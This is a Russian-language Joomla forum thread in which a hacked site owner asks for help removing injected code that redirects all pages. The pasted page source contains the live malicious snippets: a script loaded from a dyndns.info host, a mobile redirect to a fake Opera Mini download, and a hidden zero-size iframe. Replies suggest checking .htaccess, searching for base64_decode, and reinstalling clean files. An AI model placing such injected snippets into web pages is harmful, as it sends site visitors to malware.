Взломали переадресация со всех страниц

Тема в разделе "Вопросы безопасности", создана пользователем Magi, 19.10.2012.

  1. Offline

    Magi Недавно здесь

    Регистрация:
    03.10.2007
    Сообщения:
    23
    Симпатии:
    0
    Пол:
    Мужской
    Помогите пожалуйста! Вчера обнаружил переадресацию со своего сайта на какой-то левый...

    Внедрили код, никак не могу избавится. Переадресует со всех страниц.
    Бэкап видимо уже с внедрением...
    Начинается со строки с dyndns
    grep -R dyndns * - в одном месте нашел, удалил, но все равно переадресует

    Может ли firebug показать из какого файла внедряется код?
    Если да, то как в нем это посмотреть?

    <html xmlns="http://www.w3.org/1999/xhtml">
    <head><link type="text/css" href="/cache/wo/2630afd2ca.css?1285525165" rel="stylesheet">
    <title lang="wo">Name.ru - сайт</title>
    <script language="JavaScript" type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
    <script type="text/javascript">
    _uacct = "UA-XXXXXXXXXXX";
    urchinTracker();
    </script>
    <script src="http://www.name.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2" type="text/javascript"></script>
    <script src="http://www.name.ru/components/com_jcomments/libraries/joomlatune/ajax.js" type="text/javascript"></script>
    <base href="http://www.name.ru/"/>
    <link rel="alternate" type="application/rss+xml" title="name.Ru - сайт" href="http://www.name.ru/index2.php?option=com_rss&amp;feed=RSS2.0&amp;no_html=1"/>
    <link rel="shortcut icon" href="http://www.recipe.ru/images/favicon.ico"/>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"/>
    <link rel="shortcut icon" href="http://www.name.ru/templates/mbt_macro_blue/images/favicon.ico"/>


    -----------Вот скрипт-------------
    <nofollow><script language='JavaScript' src=http://se4fegwv1.dyndns.info/infon.php?i=22322></script></nofollow><script>
    function Valid(){
    frm = document.forms['formSearch'];
    if(frm.searchword.value == '' || frm.searchword.value == 'Search ...'){
    alert('Please input search condition.');
    return false;
    }
    return true;
    }

    function submitForm(){
    if (Valid())
    document.forms['formSearch'].submit();
    }
    </script>
    </head>
    <script type="text/javascript">
    if(navigator.userAgent.match(/(symbos|windows mobile|smartphone|blackberry|ppc|midp|windows ce|mtk|j2me|symbian|series 60|android)/i)!==null)
    window.location = "http://fileozon.com/opera_mini/7920/opera_mini.auto"; </script>
    <BODY>
    <table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td align="center">
    <table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="white">
    <iframe src="http://www.name.ru/new/jom.php" width="0" height="0" align="left">
    </iframe>


    <!-- START HEADER: TOP MODULE+PATHWAY+HEADER IMAGE+SEARCH-->
    <tr>
    <td>
    <table width="100%" border="0" cellpadding="0" cellspacing="3">
    <tr>
    <td id="top_outer">
    <div id="top">
    <table width="99%" cellspacing="0" cellpadding="0"><tr><td>
    <form action="index.php?option=com_search&amp;Itemid=11" method="get">
    <div class="search">
    <input name="searchword" id="mod_search_searchword" maxlength="20" alt="search" class="inputbox" type="text" size="20" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';"/> </div>
    <input type="hidden" name="option" value="com_search"/>
    <input type="hidden" name="Itemid" value="11"/>
    </form> </td><td width="15" style="padding-top:1px !important;padding-top:2px;"><img src="http://www.name.ru/templates/mbt_macro_blue/images/search.gif" width="15" height="15" vspace="0" hspace="0" onclick="document.forms[0].submit()" style="cursor:hand;cursor:pointer"></td></tr></table>
    </div>
    </td>
    <td id="pathway_outer" colspan="2">
    <!-- START TOP MENU -->
     
  2.  
  3. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 048
    Симпатии:
    520
    Пол:
    Мужской
    .htaccess смотри.Joomla 1.0 ?
    И поиск по файлам шаблона,а лучше всего сайта - base64_decode
     
  4. Offline

    Magi Недавно здесь

    Регистрация:
    03.10.2007
    Сообщения:
    23
    Симпатии:
    0
    Пол:
    Мужской
    Т.е. подозрительные моменты это

    administrator/components/com_installer/component/jcomments.class.php: $tmpl->addGlobalVar('support', base64_decode('PGEgaHJlZj0iaHR0cDovL3d3dy5qb29tbGF0dW5lLnJ1IiB0aXRsZT0iSkNvbW1lbnRzIiB0YXJnZXQ9Il9ibGFuayI+SkNvbW1lbnRzPC9hPg=='));

    administrator/components/com_installer/mambot/web-optimizer/libs/php/css.sprites.php: @fwrite($fp, base64_decode(preg_replace("/.*;base64,/", "", $this->css_image)));
    administrator/components/com_sef/sef.class.php: eval(base64_decode('JHNlZkRpckFkbWluID0gJEdMT0JBTFNbJ21vc0NvbmZpZ19hYnNvbHV0ZV9wYXRoJ10uJy9hZG1pbmlzdHJhdG9yL2NvbXBvbmVudHMvY29tX3NlZi8nOwovLyBsb2FkIGNoZWNrc3VtcwokbGljZW5zZSAgPSB0cmltKEBmaWxlX2dldF9jb250ZW50cygkc2VmRGlyQWRtaW4uJ3NpZ25hdHVyZS5iNjQnKSk7CiRjaGVja3N1 и далее страница символов...
     
  5. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 048
    Симпатии:
    520
    Пол:
    Мужской
    Если это в начале файла-то да,удаляй строку/весь код из файла
     
  6. Offline

    Magi Недавно здесь

    Регистрация:
    03.10.2007
    Сообщения:
    23
    Симпатии:
    0
    Пол:
    Мужской
    Подозрительными можно считать только те вхождения, которые включают base64_decode с кодом типа этого JHNlZkRpckFkbWluID0gJEdMT0JBTF или и другие вхождения?Те, которые с кодом удалил и в одном месте закомментировал, т.к. не уверен во вредоносности, но код все равно вставляется.
     
  7. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 048
    Симпатии:
    520
    Пол:
    Мужской
    Трудно мне описать все подробно,как я очищаю сайты.Это опыт и сайты разные,с разными расширениями.Я J1.0 не знаю
    Обрати внимание на файлы компонента вывода контента.
    Сканер в помощь
    http://joomla-support.ru/post152220-25.html
    п.с.
    А может просто перезалей файлы из чистого дистра J1.0,Если не трогал ядро Joomla
     

Поделиться этой страницей

Загрузка...